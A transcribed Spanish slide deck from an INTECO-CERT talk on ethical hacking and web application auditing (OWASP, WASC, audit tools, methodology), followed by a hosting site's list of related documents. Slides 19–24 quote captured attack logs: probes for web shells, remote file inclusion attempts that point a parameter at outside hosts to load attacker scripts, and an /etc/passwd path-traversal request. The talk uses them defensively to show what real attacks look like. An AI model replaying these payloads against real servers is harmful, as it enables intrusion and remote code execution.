Día 23, Hacking ético: Auditoria web y perspectiva desde la Administración Publica
|
|
- Sergio Salinas San Martín
- hace 8 años
- Vistas:
Transcripción
1 Día 23, Hacking ético: Auditoria web y perspectiva desde la Administración Publica DANIEL FIRVIDA PEREIRA Técnico de seguridad - INTECO-CERT 23 de Noviembre 1º ENCUENTRO NACIONAL DE LA INDUSTRIA DE SEGURIDAD
2 Índice 1. econfianza en INTECO. 1. INTECO-CERT: Objetivos y Servicios. 2. Auditorias Web. 1. OWASP & WASC. 2. Vulnerabilidades Web hoy en día. 3. Aplicaciones de auditoria para Web. 4. Procedimientos y técnicas de auditoria Web. 3. Hacking ético dentro de la Administración Publica. 1. Experiencias de colaboración de INTECO. 2. El otro lado: muestras de un ataque Web. 2
3 Actuaciones en e-confianza de INTECO 1. Qué es INTECO? Instituto Nacional de Tecnologías de la Comunicación Sociedad estatal adscrita al MITYC a través de SETSI Instrumento del Plan Avanza para el desarrollo de la S.I Pilares: Investigación aplicada, prestación de servicios y formación OBJETIVOS Convergencia de España con Europa Crear en León un "Cluster-TIC" con alta capacidad de innovación. Transversalidad tecnológica entre sectores y áreas de conocimiento TIC Alta localización de conocimiento intensivo y conexión con otros centros internacionales. 3
4 Actuaciones en e-confianza de INTECO 2. Líneas estratégicas de actuación e-confianza (Seguridad) Calidad SW Accesibilidad Centro de Respuesta a Incidentes en Tecnologías de la Información para PYMEs y Ciudadanos Centro Demostrador de Seguridad para la PYME Laboratorio Nacional de Calidad Formación Promoción de proyectos TIC Promoción de estándares y normalización Centro de Referencia en estándares Web Promoción de la Accesibilidad Tecnológica y aplicación en la AGE (Portales, plataforma TDT, etc) Innovación en Tecnologías de Accesibilidad Ciudadanía e Internet Innovación TIC y Competitividad PYME 4
5 Actuaciones en e-confianza de INTECO 3. Proyectos en e-confianza e-confianza Sentar las bases de coordinación de iniciativas públicas en torno a la seguridad de los SI Coordinar investigación aplicada y formación especializada en el ámbito de la seguridad TIC. Convertirse en el Centro de Referencia en Seguridad Informática a nivel nacional. Servicios a PYME Servicios a Ciudadanos Observatorio de la Seguridad de la Información INTECO-CERT, Centro Nacional de Respuesta a Incidentes en Tecnologías de la Información para Pymes y Ciudadanos (antiguo CATA) Centro Demostrador de Seguridad para Pymes 5
6 Centro de Respuesta INTECO INTECO-CERT Misión y objetivos Servicios 6
7 Misión y objetivos de INTECO-CERT Objetivos Concienciar a las PYMEs y ciudadanos en materia de seguridad e impulsar su uso. Proporcionar mecanismos y servicios de prevención y reacción ante incidencias en materia de seguridad de la información. Proporcionar información clara y concisa acerca de la tecnología y la seguridad Proporcionar guías de buenas prácticas, recomendaciones y consejos Actuar como enlace entre las necesidades de PYMEs y ciudadanos y las soluciones existentes en el mercado 7
8 Servicios Prestados por INTECO-CERT Servicios en materia de seguridad: Servicios de Información: Suscripción a boletines y alertas Actualidad, noticias y eventos Avisos online sobre nuevos virus, vulnerabilidades, correo electrónico no deseado. Servicios de Formación: guías, manuales, cursos online Servicios de Protección: útiles gratuitos y actualizaciones de software Servicios de Respuesta y Soporte: Gestión y resolución de Incidencias Gestión de Malware o código malicioso Fraude electrónico Asesoría Legal Foros 8
9 Auditorias Web OWASP: Open Web Application Security Project Qué es OWASP? Fundación sin animo de lucro. Creada en Independiente de los fabricantes. Formada por voluntarios. Objetivos: Promover la seguridad de las aplicaciones web. Buscar las causas de la inseguridad. Proporcionar soluciones a las amenazas. Crear herramientas, documentación y estándares. 9
10 Auditorias Web OWASP: Open Web Application Security Project Qué hace OWASP? Recursos para equipos de desarrollo. Foros de discusión. Aplicaciones para auditoria y para formación. Documentación y artículos. Proyectos dentro de OWASP: Webscarab: Herramienta para auditoria. WebGoat: Herramienta para formación. OWASP Testing: Metodología. Web Application Penetration Checklist: Documentación. OWASP Guide y Top Ten Project: Documentación. 10
11 Auditorias Web WASC: Web Application Security Consortium Qué es WASC? Participada por la industria, expertos y organizaciones. Foro abierto de participación. Objetivos: Promover estándares de seguridad web. Elaboración de artículos y guías de seguridad web. Compartir el conocimiento sobre las amenazas web. Proyectos: Application Security Scanner Evaluation Criteria. Web Hacking Incidents Database. Distributed Open Proxy Honeypots. Web Security Threat Classification. 11
12 Vulnerabilidades Web Vulnerabilidades Web hoy en día: El Top 10 de vulnerabilidades de OWASP Cross Site Scripting (XSS). Inyecciones de código. Ejecución de ficheros maliciosos. Manipulación de rutas a objetos. Cross Site Request Forgery (CSRF). Manejo inadecuado de errores. 12
13 Vulnerabilidades Web Vulnerabilidades Web hoy en día: El Top 10 de vulnerabilidades de OWASP Robo de credenciales de sesión o de control de acceso. Almacenamiento de datos inseguro. Comunicaciones por un canal inseguro. Fallo en la ocultación de URLs de gestión
14 Aplicaciones de auditoria Web Aplicaciones comerciales Características comunes Propósito múltiple (no exclusivas por vulnerabilidad). Capacidad de auditoria ante cualquier tipo de aplicativo. Incorporan utilidades para pruebas manuales. Aspectos Configurables. Proporcionan abundante documentación. Suelen ser herramientas lentas. Tienen muchos falsos positivos. Un elevado precio. 14
15 Aplicaciones de auditoria Web Aplicaciones gratuitas Características comunes La mayoría son para un propósito especifico. Tienen limitaciones para algún tipo de aplicativo. Incorporan utilidades para pruebas manuales. Mayor capacidad de configuración. Proporcionan menos documentación. Suelen ser herramientas lentas. Tienen muchos falsos positivos. Son gratis. 15
16 Procedimientos y técnicas de auditoria Utilización de la herramienta adecuada a cada aplicativo. Metodología de auditoria. OWASP Testing. Web Application Penetration Checklist. OSSTMM. Chequear todos los resultados de las herramientas. Uso de herramientas para localización de URLs ocultas. Conocer en lo posible la aplicación. 16
17 Procedimientos y técnicas de auditoria Documentarse sobre las vulnerabilidades existentes. Uso de distintos patrones de los ataques XSS (Cross Site Scripting) Cheat Sheet - XSSDB attack database - Captura de evidencias. No realizar denegaciones de Servicio. Uso de herramientas de aprendizaje como WebGoat o participación en concursos de hacking 17
18 Experiencias de colaboración de INTECO-CERT Vulnerabilidades más encontradas Vulnerabilidades de SQL inyection. Con obtención de usuarios y contraseñas. Incorrecto manejo de sesiones. Posibilidad de saltarse la autenticación y obtener una sesión privilegiada en la aplicación. Incorrecta configuración del servidor. Listado de directorios. Obtención de información sensible del servidor. Acceso a ficheros de logs. Versiones no actualizadas o con vulnerabilidades. Versiones de PHP, del gestor de contenidos, etc. 18
19 El otro lado: muestras de un ataque Búsqueda de un objetivo para un ataque GET /horde-3.0.6//readme HTTP/1.1 GET /horde-3.0.7//readme HTTP/1.1 GET /horde-3.0.8//readme HTTP/1.1 GET / //readme HTTP/1.1 GET /webmail//readme HTTP/1.1 GET /mailz//readme HTTP/1.1 GET /horde2//readme HTTP/1.1 GET //scgi/awstats/awstats.pl HTTP/1.1 GET //scripts/awstats.pl HTTP/1.1 GET //cgi-bin/awstats/awstats.pl HTTP/1.1 GET //cgi-bin/stats/awstats.pl HTTP/1.1 GET //scgi-bin/stats/awstats.pl HTTP/1.1 CONNECT :8080 HTTP/1.0 OPTIONS * HTTP/1.0 19
20 El otro lado: muestras de un ataque Búsqueda de un objetivo para un ataque GET /phpmyadmin/main.php HTTP/1.0 GET /phpmyadmin/main.php HTTP/1.0 GET /phpmyadmin/tbl_select.php HTTP/1.1 GET /phpmyadmin0/tbl_select.php HTTP/1.1 GET /mysql/phpmyadmin/tbl_select.php HTTP/1.1 GET /xampp/phpmyadmin/tbl_select.php HTTP/1.1 GET /phpmyadmin2/read_dump.php HTTP/1.0 GET /phpmyadmin-2.2.3/read_dump.php HTTP/1.0 GET /phpmyadmin/r57.php HTTP/1.1 GET /phpmyadmin/c99.php HTTP/1.1 GET /phpmyadmin/shell.php HTTP/1.1 GET /phpmyadmin/cmd.php HTTP/1.1 GET /w00tw00t.at.isc.sans.mslog:) HTTP/1.1 GET /w00tw00t.at.isc.sans.pwn!t:) HTTP/1.1 GET /w00tw00t.at.isc.sans.dfind:) HTTP/1.1 20
21 El otro lado: muestras de un ataque Trazas de un intento de ataque /amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]= ww.theranchjohnstown.com/menu/r7?? HTTP/1.1 /en/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]= /sh311.altervista.org/a.txt?? HTTP/1.1 /amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]= 311.altervista.org/a.txt?? HTTP/1.1 /textos/en//amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_di r]=ftp://ftp.metaltrade.ru/incoming/%ff%ff%ff%ff%ff%ffo%ff%ff %FF%FF%FF%FF/1? HTTP/1.1 //amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=ftp:// /upload/ p/old? HTTP/1.1 /_vti_bin/owssvr.dll?ul=1&act=4&build=6254&strmver=4&capreq=0 HTTP/1.1 21
22 El otro lado: muestras de un ataque Trazas de un intento de ataque GET /includes/ordersuccess.inc.php?&glob=1&cart_order_id=1&glob[rootdir]=h ttp:// /joomla/1.gif?/ HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate Accept-Language: en-us Connection: Close Host: X User-Agent: Morfeus Fucking Scanner mod_security-action: 406 HTTP/ Not Acceptable Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso
23 El otro lado: muestras de un ataque Trazas de un intento de ataque GET /textos/en//amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root _dir]=ftp://ftp.metaltrade.ru/incoming/%ff%ff%ff%ff%ff%ffo%ff%f F%FF%FF%FF%FF/1? HTTP/1.1 Connection: TE, close Host: TE: deflate,gzip;q=0.3 User-Agent: libwww-perl/5.808 mod_security-action: 406 HTTP/ Not Acceptable Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso
24 El otro lado: muestras de un ataque Trazas de un intento de ataque GET /cgi-bin/netauth.cgi?cmd=show&page=../../../../../../../../../../etc/passwd HTTP/1.0 Connection: Keep-Alive Content-Length: 0 Host: User-Agent: Mozilla/4.75 (Nikto/1.35 ) mod_security-action: 406 HTTP/ Not Acceptable Connection: close Content-Type: text/html; charset=iso
25 Preguntas? 25
SEGURIDAD WEB: AUDITORÍAS Y HERRAMIENTAS. Daniel Firvida Pereira daniel.firvida@inteco.es Marzo de 2009
SEGURIDAD WEB: AUDITORÍAS Y HERRAMIENTAS Daniel Firvida Pereira daniel.firvida@inteco.es Marzo de 2009 Índice Seguridad Web: Auditorías y Herramientas 0. Presentación INTECO 1. Auditorías Web 1) Introducción
Más detallesDía 1, Taller hacia un correo limpio y seguro
Día 1, Taller hacia un correo limpio y seguro Juan Díez González Técnico de seguridad - INTECO-CERT 21 de Noviembre 1º ENCUENTRO NACIONAL DE LA INDUSTRIA DE SEGURIDAD Índice 1. Qué es INTECO? 2. Líneas
Más detallesINTRODUCCIÓN A LA SEGURIDAD EN SISTEMAS Y WEBS
INTRODUCCIÓN A LA SEGURIDAD EN SISTEMAS Y WEBS Marco A. Lozano Merino Mayo 2012 Índice 1.Seguridad a nivel de usuario 1.Amenazas y protección 2.La realidad de la seguridad: hackers 3.Seguridad en redes
Más detallesINTECO CERT. Centro de Respuesta a Incidentes en TI para PYMEs y Ciudadanos. XXIII Grupos de Trabajo RedIRIS. Francisco A. Lago García 26 VI 2007
INTECO CERT Centro de Respuesta a Incidentes en TI para PYMEs y Ciudadanos XXIII Grupos de Trabajo RedIRIS Francisco A. Lago García 26 VI 2007 Contenidos Qué es INTECO Por qué un CERT para PYMEs y Ciudadanos
Más detallesFraude y riesgos informáticos en España
Fraude y riesgos informáticos en España Cátedra Gestión de Riesgos en Sistemas de Información. Instituto de Empresa, GMV, Oracle, INTECO. Elena García Díez 4 Junio 2008 Índice 1. Qué es INTECO? 2. Líneas
Más detallesSeguridad en la Red: recomendaciones y recursos para la seguridad
Seguridad en la Red: recomendaciones y recursos para la seguridad IV Semana de Seguridad Informática Fundación Dédalo Tudela, 24 de Marzo de 2010 Héctor R. Suárez (INTECO) hectorrene.suarez@inteco.es OBSERVATORIO
Más detallesXV Jornadas de Investigación en las Universidades Españolas. Las Palmas de Gran Canaria, 21 de noviembre 2007
INTECO. Presentación corporativa XV Jornadas de Investigación en las Universidades Españolas Las Palmas de Gran Canaria, 21 de noviembre 2007 Indice 1. QUÉ ES EL PLAN AVANZA? 2. QUÉ ES EL INTECO? 3. LINEAS
Más detallesLaboratorio Nacional de Calidad del Software Servicios de apoyo a la empresa
Laboratorio Nacional de Calidad del Software Servicios de apoyo a la empresa XI Jornadas de Innovación y Calidad del Software Alcalá de Henares - Septiembre 2009 Diagnóstico Inicial El 86% de los entrevistados
Más detallesSeguridad de la Información: un reto para la empresa Seguridad TIC para la PYME
Seguridad de la Información: un reto para la empresa Seguridad TIC para la PYME INTECO CERT Área de e Confianza de INTECO Índice de la Jornada 1. El Instituto Nacional de las Tecnologías de la Comunicación,
Más detallesIniciativas públicas en torno a la seguridad informática. Instituto Nacional de Tecnologías de la Comunicación
Iniciativas públicas en torno a la seguridad informática Instituto Nacional de Tecnologías de la Comunicación Índice 1. Qué es INTECO? 2. Líneas estratégicas de actuación I. Motivación de INTECO-CERT 3.
Más detallesAUDITORÍAS TÉCNICAS PARA LA CERTIFICACIÓN DE LOS SISTEMAS DE RECOGIDA DE INICIATIVAS CIUDADANAS EUROPEAS
AUDITORÍAS TÉCNICAS PARA LA CERTIFICACIÓN DE LOS SISTEMAS DE RECOGIDA DE INICIATIVAS CIUDADANAS EUROPEAS Las auditorias técnicas según el Reglamento 211/2011 de la Unión Europea y según el Reglamento de
Más detallesHacking Ético Web. I Jornadas Tecnológicas CEEPS 27-03-2012 Carlos García García i52gagac@uco.es ciyinet@gmail.com. @ciyinet
Hacking Ético Web I Jornadas Tecnológicas CEEPS 27-03-2012 Carlos García García i52gagac@uco.es ciyinet@gmail.com @ciyinet Índice Introducción OWASP OWASP Top 10 (2010) Demostración ataques Inyección SQL
Más detallesSeguridad TIC en la PYME Semana sobre Seguridad Informática
Seguridad TIC en la PYME Semana sobre Seguridad Informática Iñigo Tomé Bermejo Centro Demostrador de Seguridad para la PYME Versión 0.e Índice de la Jornada Parte 1 1. La PYME y el reto de la seguridad
Más detallesIngeniero Técnico en Informática - UCA Máster en Ingeniería del Software - US Máster en Seguridad de las TIC - US
Sobre mi Formación Ingeniero Técnico en Informática - UCA Máster en Ingeniería del Software - US Máster en Seguridad de las TIC - US Experiencia Aficiones 4+ años como desarrollador web, más de 2 en Drupal
Más detallesOffensive State Auditoría de Aplicaciones Web
Offensive State Auditoría de Aplicaciones Web Tabla de contenidos Servicio de auditoría en aplicaciones web...3 Por qué?...3 Metodologías...4 Etapas y pruebas a realizar...4 1. Fingerprint del objetivo...4
Más detallesIntroducción a OWASP OWASP. The OWASP Foundation http://www.owasp.org
Introducción a Ing. Camilo Fernandez Consultor en Seguridad Informática Octubre, 2010 cfernandez@develsecurity.com Copyright 2004 - The Foundation Permission is granted to copy, distribute and/or modify
Más detallesAutorizan ejecución de la "Encuesta de Seguridad de la Información en la RESOLUCIÓN MINISTERIAL N 187-2010-PCM
Autorizan ejecución de la "Encuesta de Seguridad de la Información en la Administración Pública - 2010" 15 de junio de 2010 CONSIDERANDO: RESOLUCIÓN MINISTERIAL N 187-2010-PCM Que, el artículo 2 o del
Más detallesMÁSTER UNIVERSITARIO EN INGENIERÍA WEB. Guía de Aprendizaje Información al estudiante
MÁSTER UNIVERSITARIO EN INGENIERÍA WEB Datos Descriptivos Guía de Aprendizaje Información al estudiante Escuela Técnica Superior de Ingeniería de Sistemas Centro responsable Informáticos Titulación: Máster
Más detallesTu Educación en Manos de Profesionales
La Universidad Nacional de Ingeniera (UNI) a través de la Dirección de Posgrado, tiene el agrado de invitarlos a la Segunda Convocatoria de cursos especializados de capacitación y actualización continua
Más detallesIn-seguridad y malware en dispositivos móviles
In-seguridad y malware en dispositivos móviles Damián Muraña damian @ murana.uy @damianmurana damianmurana@joindiaspora.com www.murana.uy Para qué usamos los móviles? 03/2013 Com. por internet E-Mail Noticias
Más detalles1. Aplica medidas de seguridad pasiva en sistemas informáticos describiendo características de entornos y relacionándolas con sus necesidades
Módulo Profesional: Seguridad informática. Código: 0226. Resultados de aprendizaje y criterios de evaluación. 1. Aplica medidas de seguridad pasiva en sistemas informáticos describiendo características
Más detallesOWASP: Un punto de vista. aplicaciones web seguras
OWASP: Un punto de vista pragmático para el desarrollo de aplicaciones web seguras Armando Carvajal (armando.carvajal@globalteksecurity.com) Gerente Arquitecto Soluciones Globaltek Security Master en seguridad
Más detallesEl gasto total elegible de la BBPP, Centro de Supercomputación es de 3.172.033,11. La ayuda FEDER, es el 80%, 2.537.626,48
Otra buena práctica de actuación cofinanciada es la presentada por la Dirección General de Telecomunicaciones de la Junta de Castilla y León consistente en las actuaciones realizadas en la Fundación Centro
Más detalles100% Laboratorios en Vivo
100% Laboratorios en Vivo Sabemos que la única forma de aprender es haciendo. Por lo mismo todos los laboratorios son con desafíos de hacking en un ambiente en vivo. Con servidores y servicios dentro de
Más detallesFORMACIÓN PRESENCIAL ESPECIALIZADA - SEGURIDAD EN ENTORNOS WEB - MODULO I ENTORNO DE DESARROLLO WEB. MYSQL+PHP AUDITOR DE SEGURIDAD EN ENTORNOS WEB.
FORMACIÓN PRESENCIAL ESPECIALIZADA - SEGURIDAD EN ENTORNOS WEB - AUDITOR DE SEGURIDAD EN ENTORNOS WEB. MODULO I ENTORNO DE DESARROLLO WEB. MYSQL+PHP AUDITOR DE SEGURIDAD EN ENTORNOS WEB. MODULO II - HACKING
Más detallesAtaques XSS en Aplicaciones Web
Ataques XSS en Aplicaciones Web Education Project Antonio Rodríguez Romero Consultor de Seguridad Grupo isoluciones antonio.rodriguez@isoluciones.es Copyright 2007 The Foundation Permission is granted
Más detallesLOGO COLABORADOR 14.11.2007 1
14.11.2007 1 AUDITORÍA WEB D. Ángel Alonso Párrizas CISM, CISSP, GCIH, GCIA, CCNA Ingeniero de Seguridad 14.11.2007 2 1. Clasificación de las auditorias web 2. Auditoría Jurídica/legal 3. Auditoría accesibilidad
Más detallesPlan Provincial de consolidación de empresas a través del comercio electrónico. Enero 2014
Plan Provincial de consolidación de empresas a través del comercio electrónico. Enero 2014 Índice 1. El Plan Provincial En qué consistía? El Plan paso a paso 2. Quiénes han sido los beneficiarios del programa?
Más detallesPORTAFOLIO DE SERVICIOS.
PORTAFOLIO DE SERVICIOS. Quienes Somos Organización Servicios Social www.teksystem.co / Somos una empresa de emprendedores enfocada a dar soluciones innovadoras y oportunas bajo los estándares de calidad
Más detallesVulnerabilidades de los sistemas informáticos
Vulnerabilidades de los sistemas informáticos formador Ezequiel Llarena Borges http://youtu.be/fdhayogalv4/ 1 Responsables de las vulnerabilidades que afectan a los sistemas informáticos formador Ezequiel
Más detallesDIRECCION DE PROYECTOS II
DIRECCION DE PROYECTOS II DESARROLLO DEL CURSO PROFESIONAL EN DIRECCION DE PROYECTOS II: Durante el desarrollo del Curso Profesional en Dirección de Proyectos II, el alumno irá asimilando el contenido
Más detallesLa OWASP Foundation y los objetivos del capítulo español OWASP 16/6/2006. The OWASP Foundation http://www.owasp.org
La Foundation y los objetivos del capítulo español Vicente Aguilera Díaz Spain Chapter Leader vicente.aguilera@owasp.org 16/6/2006 Copyright The Foundation Permission is granted to copy, distribute and/or
Más detallesServicios de Seguridad de la Información
Servicios de Seguridad de la Información Las siguientes actuaciones son medidas dirigidas a garantizar la Confidencialidad, Privacidad y Disponibilidad de los Servicios de la Información y que podemos
Más detallesSOLUCIONES AVANZADAS EN TECNOLOGIA, INFORMATICA Y COMUNICACIONES SOCIEDAD POR ACCIONES SIMPLIFICADA
SOLUCIONES AVANZADAS EN TECNOLOGIA, INFORMATICA Y COMUNICACIONES SOCIEDAD POR ACCIONES SIMPLIFICADA SOLUCIONES AVANZADAS TIC S.A.S PRESENTACION CORPORATIVA septiembre de 2015 Presentación Corporativa SOLUCIONES
Más detallesAdministración de Servicios Web (Online)
TITULACIÓN DE FORMACIÓN CONTINUA BONIFICADA EXPEDIDA POR EL INSTITUTO EUROPEO DE ESTUDIOS EMPRESARIALES Administración de Servicios Web (Online) Duración: 180 horas Precio: 0 * Modalidad: Online * hasta
Más detallesINTRODUCCIÓN INTRODUCCIÓN. Guía de Comunicación Digital para la Administración General del Estado. Página 1 de 8
Página 1 de 8 LA GUIA DE COMUNICACIÓN DIGITAL PARA LA ADMINISTRACIÓN GENERAL DEL ESTADO En los últimos años la comunicación digital a través de sitios web y redes sociales ha adquirido una importancia
Más detallesCurso Online. Desarrollo Seguro en Java
Curso Online Desarrollo Seguro en Java Índice: >> Plan de estudios >> Introducción >> A quién va dirigido >> Metodología >> Dinámica >> Contenido Cursos Online Plan de estudios: Itinerario Formativo por
Más detallesCOSMOS Intelligence System responde a las siguientes necesidades:
PLATAFORMA COSMOS IINTELLIIGENCE SYSTEM Vigilancia e Inteligencia Estratégica La experiencia de conocer y haber utilizado múltiples sistemas y plataformas para la gestión de la Vigilancia y la Inteligencia
Más detallesAgenda. I. Presentación II.Antecedentes III.Distintos ámbitos IV.A jugar
Agenda I. Presentación II.Antecedentes III.Distintos ámbitos IV.A jugar Juan Antonio Calles (@jantoniocalles) Quiénes somos? Jefe de Proyectos de Seguridad en everis www.flu-project.com elblogdecalles.blogspot.com
Más detallesPruebas de Seguridad en aplicaciones web segun OWASP Donde estamos... Hacia donde vamos?
Venezuela The Foundation http://www.owasp.org Chapter Pruebas de Seguridad en aplicaciones web segun Donde estamos... Hacia donde vamos? Edgar D. Salazar T Venezuela Chapter Leader edgar.salazar@owasp.org
Más detallesPLAN DE INTEGRACIÓN DE LAS TIC EN EL CENTRO
ORIENTACIONES PARA LA ELABORACIÓN DE UN: PLAN DE INTEGRACIÓN DE LAS TIC EN EL CENTRO PLAN DE INTEGRACIÓN DE LAS TIC EN EL CENTRO El Plan TIC de centro debe contemplar actuaciones concretas: en la integración,
Más detallesPliego de Prescripciones Técnicas para la contratación de un servicio para la ejecución de la estrategia digital y la comunicación 2015 de BILIB
Pliego de Prescripciones Técnicas para la contratación de un servicio para la ejecución de la estrategia digital y la comunicación 2015 de BILIB 1. OBJETO El objeto de la licitación en la definición y
Más detallesPERFIL TÉCNICO CONSULTOR SHAREPOINT PARA LA WEB
PLIEGO DE PRESCRIPCIONES TÉCNICAS PARA LA CONTRATACIÓN DE LA CONSULTORÍA Y ASISTENCIA PARA LOS PROYECTOS WEB EN EL TRIBUNAL CONSTITUCIONAL PERFIL TÉCNICO CONSULTOR SHAREPOINT PARA LA WEB 1 Índice Antecedentes...
Más detallesTel 647 75 81 30 Email cm@consultormarketing.es Web www.consultormarketing.es. 1. consultormarketing.es
1. consultormarketing.es Consultor Marketing se presenta como una alternativa empresarial a las grandes agencias de marketing y comunicación. Formada por profesionales expertos con un perfil multidisciplinar,
Más detallesDESARROLLO DE NEGOCIO ASEGURADOR Y SERVICIOS
DESARROLLO DE NEGOCIO ASEGURADOR Y SERVICIOS DNAS... a tu servicio Hay Corredurías de Seguros y Empresas de Correduría como la tuya. Una Empresa de Correduría es un negocio eficiente y rentabl, siempre
Más detallesTecnología al servicio de sus ideas
1. Pautas Generales Universidad Tecnológica de Pereira Centro de Recursos Informáticos y Educativos Políticas de la Web Toda información y material que se incorpore al Sitio de la Universidad en Internet
Más detallesTecninorte Programación y Mantenimiento Parque Empresarial Tirso González, 22 - oficina 3 39610 - Astillero - Cantabria
Misión y Valores Para nuestra empresa el cliente es lo más importante, por ello ofrecemos una estrecha relación de confianza y colaboración. Nuestra intención es poder ofrecer a nuestros clientes un servicio
Más detallesJosé Luis Colvée. Director General de Anetcom
José Luis Colvée Director General de Anetcom Anetcom - Quiénes somos ANETCOM es la asociación sin ánimo de lucro para el fomento del comercio electrónico empresarial y de las Nuevas Tecnologías en la Comunidad
Más detallesOficina de Seguridad del Internauta (OSI). Ministerio de Industria, Turismo y Comercio DATOS GENERALES. Antecedentes del servicio
Oficina de Seguridad del Internauta (OSI). Ministerio de Industria, Turismo y Comercio DATOS GENERALES Antecedentes del servicio Los usuarios frecuentes, es decir, los que se conectan a la red a diario
Más detallesSe encabeza este apartado puntualizando del modo siguiente:
Otros recursos humanos disponibles: Se encabeza este apartado puntualizando del modo siguiente: 1º Por la Dirección de Calidad, la persona vinculada a esta titulación es licenciada y contratada en exclusiva
Más detallesMÁSTER UNIVERSITARIO EN INGENIERÍA WEB. Guía de Aprendizaje Información al estudiante
MÁSTER UNIVERSITARIO EN INGENIERÍA WEB Datos Descriptivos Guía de Aprendizaje Información al estudiante Escuela Técnica Superior de Ingeniería de Sistemas Centro responsable Informáticos Titulación: Máster
Más detallesUF1138 Instalación y Puesta en Marcha de un Sistema de Control de Acceso y Presencia (Online)
UF1138 Instalación y Puesta en Marcha de un Sistema de Control de Acceso y Presencia TITULACIÓN DE FORMACIÓN CONTINUA BONIFICADA EXPEDIDA POR EL INSTITUTO EUROPEO DE ESTUDIOS EMPRESARIALES UF1138 Instalación
Más detallesGuía de doble autenticación
Guía de doble autenticación Índice Guía doble autenticación 1. Introducción a la Doble Autenticación: Qué es? 4 Ataques a las contraseñas 6 Fuerza bruta 6 Malware 6 Phishing 6 Ataques a servidores 6 2.
Más detallesEscritorio Virtual, plataforma para la Gestión del Conocimiento en la Universidad de Sevilla
Escritorio Virtual, plataforma para la Gestión del Conocimiento en la Universidad de Sevilla Juan Camarillo Casado Director Técnico del Área de Universidad Digital Universidad de Sevilla Jornadas Técnicas
Más detallesExplotación a CMSs Web
Explotación a CMSs Web Webinar Gratuito Alonso Eduardo Caballero Quezada Consultor en Hacking Ético, Informática Forense & GNU/Linux Sitio Web: http://www.reydes.com e-mail: ReYDeS@gmail.com Jueves 5 de
Más detallesImplantación de Aplicaciones Web Fecha: 20-09-13
Página 1 de 24 RESUMEN DE LA PROGRAMACIÓN ADMINISTRACIÓN DE SISTEMAS INFORMÁTICOS EN RED CURSO AC. 2012 / 2013 ÁREA / MATERIA / MÓDULO PROFESIONAL Implantación de Aplicaciones Web (84 horas 4 horas semanales)
Más detallesSUMINISTRO DE CHEQUES RESTAURANTE Y CHEQUES GUARDERÍA.EXPEDIENTE 036/12
SUMINISTRO DE CHEQUES RESTAURANTE Y CHEQUES GUARDERÍA.EXPEDIENTE 036/12 PLIEGO DE CARACTERÍSTICAS TÉCNICAS NOVIEMBRE 2012 PCT. Expediente 036/12. Suministro de cheques restaurante y cheques guardería.
Más detallesTécnico Especialista TIC en Administración de CRM: Recursos Empresariales y de Gestión de Relaciones con Clientes
Técnico Especialista TIC en Administración de CRM: Recursos Empresariales y de Gestión de TITULACIÓN DE FORMACIÓN CONTINUA BONIFICADA EXPEDIDA POR EL INSTITUTO EUROPEO DE ESTUDIOS EMPRESARIALES Técnico
Más detalles04/04/2005 InnovaPortal e InnovaNet 26 de marzo 961 of. 404 709 36 57 Montevideo - Uruguay www.innovaportal.com
Página 1 de 1 Presentación del producto InnovaPortal es un software de gestión ideado para la creación, mantenimiento y administración de Portales Corporativos, tanto en Internet como en intranets y extranets.
Más detallesJORNADA PROFESIONAL IMPLANTACIÓN Y CERTIFICACIÓN DE LAS NORMAS
JORNADA PROFESIONAL IMPLANTACIÓN Y CERTIFICACIÓN DE LAS NORMAS ISO 27001. SISTEMAS DE GESTIÓN DE LA SEGURIDAD DE LA INFORMACIÓN ISO 20000. SISTEMAS DE GESTIÓN DE SERVICIOS TI OBJETIVOS DE LA ASOCIACIÓN
Más detallesDiagnóstico sobre la seguridad de la información y la privacidad en las redes sociales
Diagnóstico sobre la seguridad de la información y la privacidad en las redes sociales Jornada: La protección del internauta europeo Centro Europeo del Consumidor en España Madrid, 2 de julio de 2009 Pablo
Más detallesMETODOLOGIAS DE AUDITORIA INFORMATICA
METODOLOGIAS DE AUDITORIA INFORMATICA Auditoria Informatica.- Certifica la integridad de los datos informaticos que usan los auditores financieros para que puedan utilizar los sistemas de información para
Más detalles1. Instala gestores de contenidos, identificando sus aplicaciones y configurándolos según requerimientos.
Módulo Profesional: Aplicaciones web. Código: 0228. Resultados de aprendizaje y criterios de evaluación. 1. Instala gestores de contenidos, identificando sus aplicaciones y configurándolos según requerimientos.
Más detallesREPÚBLICA DE PANAMÁ CONTRALORÍA GENERAL DE LA REPÚBLICA DE PANAMÁ
1 REPÚBLICA DE PANAMÁ CONTRALORÍA GENERAL DE LA REPÚBLICA DE PANAMÁ LA IMPORTANCIA DEL USO DE BASES DE DATOS Y DE LA SEGURIDAD DE LA INFORMACIÓN PARA EL FORTALECIMIENTO DE LAS TICS EN EL EJERCICIO EFICIENTE
Más detallesCapítulo 9. Programas, líneas de actuación y medidas.
Capítulo 9. Programas, líneas de actuación y medidas. PROGRAMA 1. Mejora de la eficiencia de las pequeñas y medianas empresas comerciales. Justificación del programa. Las razones que justifican la puesta
Más detallesProyecto CAT Centro Atención al Trabajador
Proyecto CAT Centro Atención al Trabajador 1 Contenido Antecedentes del Proyecto... 3 Modelo Propuesto... 4 Objetivo general... 6 Objetivos específicos... 6 Alcance... 7 Beneficios Esperados... 7 Entorno
Más detallesFAMILIA PROFESIONAL: Informática y Comunicación CICLO SUPERIOR DESARROLLO DE APLICACIONES WEB DAW 350 HORAS
FAMILIA PROFESIONAL: Informática y Comunicación CICLO SUPERIOR DESARROLLO DE APLICACIONES WEB DAW 350 HORAS Resultados de aprendizaje y criterios de evaluación. 1. Identificar la estructura y organización
Más detallesTÉRMINOS DE REFERENCIA DE BIENES Y SERVICIOS
TÉRMINOS DE REFERENCIA DE BIENES Y SERVICIOS a. Denominación de la Contratación Servicio de consultoría para el DISEÑO E IMPLEMENTACIÓN DE UNA HERRAMIENTA TECNOLOGICA DE INNOVACIÓN. b. Finalidad Publica
Más detallesSeguridad en Aplicaciones Web
